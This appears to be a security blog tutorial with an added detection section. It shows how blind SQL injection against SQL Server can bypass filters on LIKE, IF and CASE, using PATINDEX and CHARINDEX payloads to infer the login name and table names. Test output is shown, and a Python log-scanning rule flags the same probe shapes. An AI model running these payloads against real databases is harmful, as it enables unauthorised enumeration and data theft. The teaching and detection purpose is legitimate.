0x00 Overview

Running into filtering while testing a site is perfectly normal.

This method applies when like, if and CASE are filtered,

that is, when a like-based injection can no longer be used and the page shows no output either (a blind scenario).

Explanation of the like replacements

PATINDEX('%pattern%', expression) returns the position at which the string pattern first occurs in the expression expression; positions start at 1, and 0 is returned when there is no match.

This function behaves almost exactly like like, and supports the same wildcards
_ % [ ] [^] for searching.

CHARINDEX('pattern', expression) returns the position at which the string pattern first occurs in the expression expression; positions start at 1, and 0 is returned when there is no match.

0x01 Test data

    1> select * from article;
    2> go
    +----+-----------+-----------+
    | id | title     | content   |
    +----+-----------+-----------+
    | 1  | 测试标题  | 测试内容  |
    | 2  | 测试标题2 | 测试内容2 |
    +----+-----------+-----------+
    (2 rows affected)

    # test table data: users
    sql server> select * from users;
    +----+--------------+----------+
    | id | username     | password |
    +----+--------------+----------+
    | 1  | test-user-01 | 123456   |
    | 2  | test-user-02 | 234567   |
    +----+--------------+----------+
    2 rows in set (0.00 sec)

    sql server> SELECT system_user;
    +--------+
    | field1 |
    +--------+
    | sa     |
    +--------+
    1 row in set (0.00 sec)

    sql server> select db_name();
    +--------+
    | field1 |
    +--------+
    | test   |
    +--------+
    1 row in set (0.00 sec)

0x02 PATINDEX()

0x02.1 Querying the user

SQL: select 'test' where patindex('%sa%', system_user)>=1;

    # system_user = sa
    # matching case
    1> select 'test' where patindex('%sa%', system_user)>=1;
    2> go
    +------+
    |      |
    +------+
    | test |
    +------+
    (1 rows affected)
    # non-matching case
    1> select 'test' where patindex('%aaa%', system_user)>=1;
    2> go
    +--+
    |  |
    +--+
    +--+
    (0 rows affected)

0x02.2 Querying table names

Note:
The name inside OVER(Order by table_name) has to be changed to a column that actually exists in the test.dbo.sysobjects table.
To query a different database, change the database part of the three-part name.

For example, with a test database and a test2 database present,
reference them as
test.dbo.sysobjects
test2.dbo.sysobjects

To query a different table, change the row_number value (the n-th row_number returns the n-th table name), for example:
set row_number>=1
set row_number>=2

Note:
XType='U' returns all user tables of the database;
XType='S' returns all system tables of the database;
in this example the table names of the test database are being queried.

SQL: select 'test' where patindex('%article%', (select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType='U') as a where row_number=1))>=1

    # first table name = article
    # matching case
    1> SELECT 'test'
       WHERE patindex(
           '%article%',
           (SELECT name
            FROM (SELECT ROW_NUMBER() OVER (ORDER BY name) AS row_number, name
                  FROM test.dbo.sysobjects
                  WHERE XType = 'U') AS a
            WHERE row_number = 1)
       ) >= 1;
    2> go
    +------+
    |      |
    +------+
    | test |
    +------+
    (1 rows affected)
    # non-matching case
    1> SELECT 'test'
       WHERE patindex(
           '%aaaaaaaaaaaaaa%',
           (SELECT name
            FROM (SELECT ROW_NUMBER() OVER (ORDER BY name) AS row_number, name
                  FROM test.dbo.sysobjects
                  WHERE XType = 'U') AS a
            WHERE row_number = 1)
       ) >= 1;
    2> go
    +--+
    |  |
    +--+
    +--+
    (0 rows affected)

0x03 CHARINDEX()

0x03.1 Querying the user

SQL: select 'test' where charindex('s', system_user)>=1

    # system_user = sa
    # matching case
    # first character of system_user
    1> select 'test' where charindex('s', system_user)>=1
    2> go
    +------+
    |      |
    +------+
    | test |
    +------+
    (1 rows affected)
    # second character of system_user
    1> select 'test' where charindex('sa', system_user)>=1
    2> go
    +------+
    |      |
    +------+
    | test |
    +------+
    (1 rows affected)
    # non-matching case
    1> select 'test' where charindex('aaaaa', system_user)>=1
    2> go
    +--+
    |  |
    +--+
    +--+
    (0 rows affected)

0x03.2 Querying table names

SQL: select 'test' where charindex('ar', (select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType='U') as a where row_number=1))>=1

    # first table name = article
    # matching case
    # checking characters 1-2
    1> SELECT 'test'
       WHERE charindex(
           'ar',
           (SELECT name
            FROM (SELECT ROW_NUMBER() OVER (ORDER BY name) AS row_number, name
                  FROM test.dbo.sysobjects
                  WHERE XType = 'U') AS a
            WHERE row_number = 1)
       ) >= 1;
    2> go
    +------+
    |      |
    +------+
    | test |
    +------+
    (1 rows affected)
    # checking characters 1-4
    1> SELECT 'test'
       WHERE charindex(
           'arti',
           (SELECT name
            FROM (SELECT ROW_NUMBER() OVER (ORDER BY name) AS row_number, name
                  FROM test.dbo.sysobjects
                  WHERE XType = 'U') AS a
            WHERE row_number = 1)
       ) >= 1;
    2> go
    +------+
    |      |
    +------+
    | test |
    +------+
    (1 rows affected)
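The log-side takeaway from both the PATINDEX and CHARINDEX sections, as an added example that is not part of the original post: a keyword blocklist that strips LIKE, IF and CASE still lets PATINDEX and CHARINDEX through, so a detection rule should key on the shape of the probe (a pattern or substring function applied to system_user, db_name() or the sysobjects catalog) rather than on any single keyword. The function names, regexes and sample log lines below are constructed for this example.

```python
import re
from typing import Iterator, Optional, Tuple

# SQL Server functions that act as substring/pattern tests. A blocklist that only
# strips LIKE (plus IF and CASE) still lets the other two through, which is what
# the probes in this post rely on, so the rule treats all three the same way.
PATTERN_FUNCS = ("like", "patindex", "charindex")

# Expressions whose value a boolean-blind probe confirms piece by piece.
SENSITIVE_EXPRS = (
    r"system_user", r"user_name\s*\(", r"db_name\s*\(",
    r"sysobjects", r"sys\.objects", r"sys\.tables",
)

_PROBE_RE = re.compile(
    r"\b(?P<func>" + "|".join(PATTERN_FUNCS) + r")\b"
    r"[^;]*?(?P<target>" + "|".join(SENSITIVE_EXPRS) + r")",
    re.IGNORECASE | re.DOTALL,
)


def classify_query(sql: str) -> Optional[dict]:
    """Return {'func', 'target'} when a pattern/substring function is applied
    to a sensitive expression anywhere in the statement, otherwise None."""
    m = _PROBE_RE.search(sql)
    if not m:
        return None
    return {"func": m.group("func").lower(), "target": m.group("target").lower()}


def scan_log(lines) -> Iterator[Tuple[int, dict]]:
    """Yield (line_number, finding) for every suspicious statement in a log."""
    for n, line in enumerate(lines, 1):
        finding = classify_query(line)
        if finding:
            yield n, finding


# Constructed sample log (hypothetical, not from the post): two probes of the
# shape shown above and two ordinary application queries that must stay clean.
SAMPLE_LOG = [
    "select 'test' where patindex('%sa%', system_user)>=1",
    "select 'test' where charindex('ar', (select name from (select ROW_NUMBER() "
    "OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects "
    "Where XType='U') as a where row_number=1))>=1",
    "select id, title from article where title like '%news%'",
    "select count(*) from users where username = 'test-user-01'",
]

if __name__ == "__main__":
    for n, f in scan_log(SAMPLE_LOG):
        print(f"line {n}: {f['func']}() applied to {f['target']}")
```

The rule is a triage heuristic: it will also flag legitimate administrative queries against the catalog views, so pair it with the source of the statement (application login versus DBA session) before acting on it.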